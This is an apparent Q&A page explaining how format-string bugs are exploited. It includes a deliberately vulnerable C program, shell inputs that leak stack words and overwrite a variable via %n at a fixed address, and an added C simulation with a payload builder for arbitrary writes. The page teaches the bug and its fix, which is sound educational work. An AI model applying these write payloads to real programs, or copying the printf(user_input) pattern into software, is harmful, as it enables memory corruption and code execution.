How can a Format-String vulnerability be exploited?


Question

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.

Wikipedia says:

  Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

I got the problem with the printf(buffer) version, but I still didn't get how this vulnerability can be used by an attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited, by an example?

Recommended answer

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyway):

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text); /* user-controlled format string: the bug under discussion */

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:

IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyway.

It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]


Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or the field width, to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field widths making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on format string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.

Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The Art of Exploitation (2nd ed.) by Jon Erickson.
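An added example, not part of the answer above or of Erickson's book: the real output of printf(text) depends on the compiler, the ABI (on x86-64, for instance, the first few variadic arguments are read from registers rather than the stack) and whatever happens to be in the frame, so the figures above cannot be reproduced reliably. The program below instead models what printf() does with the variadic argument pointer: every conversion consumes the next stack word, %x prints it, %n writes the running byte count through it. The 32-bit little-endian stack layout (three unrelated words, then the copied buffer), the values in those words and the `model_*`/`run_vulnerable`/`build_write_payload` names are all constructed for this example; only the some_value address 0x08049794 is taken from the answer. With that layout the example reproduces the answer's three steps: leaking the buffer bytes with four %08x, overwriting some_value with %n, and choosing the written value with a field width, plus the direct parameter access (%4$n) and short write (%hn) tricks the answer only mentions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* 32-bit little-endian target (constructed layout, an assumption): slots 0-2
 * are unrelated words, the copy of `text` that strcpy() made starts at slot 3. */
#define WORDS 32
#define SOME_VALUE_ADDR 0x08049794u  /* the answer's address of some_value */

typedef struct {
    uint32_t stack[WORDS];  /* model stack, one 32-bit word per slot */
    uint32_t some_value;    /* the static variable the answer overwrites */
    unsigned next_arg;      /* slot the next sequential conversion consumes */
} model_t;

/* Where a pointer popped off the stack points; only some_value is mapped. */
static uint32_t *resolve(model_t *m, uint32_t addr)
{
    return addr == SOME_VALUE_ADDR ? &m->some_value : NULL;
}

static void put(char *out, size_t outsz, size_t *n, char c)
{ if (*n + 1 < outsz) out[*n] = c; (*n)++; }

/* printf(fmt) with no extra arguments, as a model: every conversion pulls the
 * next stack slot. Understands %%, %x, %n, the '0' flag, a field width, %hn and
 * "%N$" direct parameter access. Returns printf's byte count, or -1 on a crash. */
static int model_printf(model_t *m, const char *fmt, char *out, size_t outsz)
{
    size_t n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') { put(out, outsz, &n, *p); continue; }
        p++;
        if (*p == '%') { put(out, outsz, &n, '%'); continue; }
        unsigned slot = m->next_arg, sequential = 1, v = 0, width = 0;
        const char *q = p;
        while (*q >= '0' && *q <= '9') v = v * 10 + (unsigned)(*q++ - '0');
        if (*q == '$' && v > 0) { slot = v - 1; sequential = 0; p = q + 1; }
        int zero = (*p == '0'); if (zero) p++;
        while (*p >= '0' && *p <= '9') width = width * 10 + (unsigned)(*p++ - '0');
        int half = (*p == 'h'); if (half) p++;
        if (slot >= WORDS) return -1;           /* walked off the model stack */
        uint32_t arg = m->stack[slot];
        if (sequential) m->next_arg++;
        if (*p == 'n') {                        /* write bytes-so-far through arg */
            uint32_t *dst = resolve(m, arg);
            if (!dst) return -1;                /* unmapped address: segfault */
            *dst = half ? ((*dst & 0xffff0000u) | ((uint32_t)n & 0xffffu)) : (uint32_t)n;
            continue;
        }
        if (*p != 'x') return -1;               /* conversion not modelled */
        char digits[16];
        int len = snprintf(digits, sizeof digits, "%x", (unsigned)arg);
        for (unsigned w = width; w > (unsigned)len; w--) put(out, outsz, &n, zero ? '0' : ' ');
        for (int i = 0; i < len; i++) put(out, outsz, &n, digits[i]);
    }
    if (outsz) out[n < outsz ? n : outsz - 1] = '\0';
    return (int)n;
}

/* Program state as the answer's printf(text) call sees it; text packed LE. */
static void setup_stack(model_t *m, const char *text)
{
    memset(m, 0, sizeof *m);
    m->some_value = (uint32_t)-72;
    m->stack[0] = 0x400u; m->stack[1] = 0xbffffa58u; m->stack[2] = 0x08048550u; /* constructed */
    for (size_t i = 0; text[i] && 3 + i / 4 < WORDS; i++)
        m->stack[3 + i / 4] |= (uint32_t)(unsigned char)text[i] << (8 * (i % 4));
}

/* printf(text) in the model; returns bytes printed and reports some_value. */
static int run_vulnerable(const char *text, char *out, size_t outsz, uint32_t *some_value)
{
    model_t m;
    setup_stack(&m, text);
    int n = model_printf(&m, text, out, outsz);
    *some_value = m.some_value; return n;
}

/* Payload writing exactly `value` to `target`: the address first (no NUL byte
 * allowed, strcpy() would stop there), two %08x to pop the words in front of
 * the buffer, a third pop padded so the byte count equals `value`, then %n. */
static int build_write_payload(char *buf, size_t bufsz, uint32_t target, unsigned value)
{
    unsigned char a[4] = { (unsigned char)target, (unsigned char)(target >> 8), (unsigned char)(target >> 16), (unsigned char)(target >> 24) };
    unsigned before = 4 + 8 + 8;            /* address bytes + two %08x */
    if (!a[0] || !a[1] || !a[2] || !a[3] || value < before + 8 || bufsz < 40) return -1;
    memcpy(buf, a, 4);
    snprintf(buf + 4, bufsz - 4, "%%08x%%08x%%%ux%%n", value - before);
    return 0;
}

int main(void)
{
    char out[256], payload[64]; uint32_t sv;
    int n = run_vulnerable("AAAA%08x.%08x.%08x.%08x", out, sizeof out, &sv);
    printf("leak:  %s  (%d bytes, some_value = %d)\n", out, n, (int)sv);
    if (build_write_payload(payload, sizeof payload, SOME_VALUE_ADDR, 0x41) == 0 &&
        run_vulnerable(payload, out, sizeof out, &sv) > 0)
        printf("write: some_value = 0x%08x\n", (unsigned)sv);
    return 0;
}
```

Build it with any C99 compiler (`cc -std=c99 -Wall fmt_model.c`, the file name being whatever you save it as). The leak run prints the buffer's own first word back as 41414141, exactly as in the answer, and the write run lands 0x41 in some_value because the third %x was given width 45 so that 4 + 8 + 8 + 45 = 65 bytes had been emitted when %n ran. Two things the model makes explicit that are easy to miss in a real run: a %n aimed at an unmapped address returns -1 (the real program segfaults), and a target address containing a zero byte is rejected, since strcpy() would truncate the payload there. For the real vulnerable program, the check to run before any of this is the compiler's: gcc and clang report `printf(text)` under `-Wformat -Wformat-security`, and the fix is the `printf("%s", text)` form the question already quotes.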

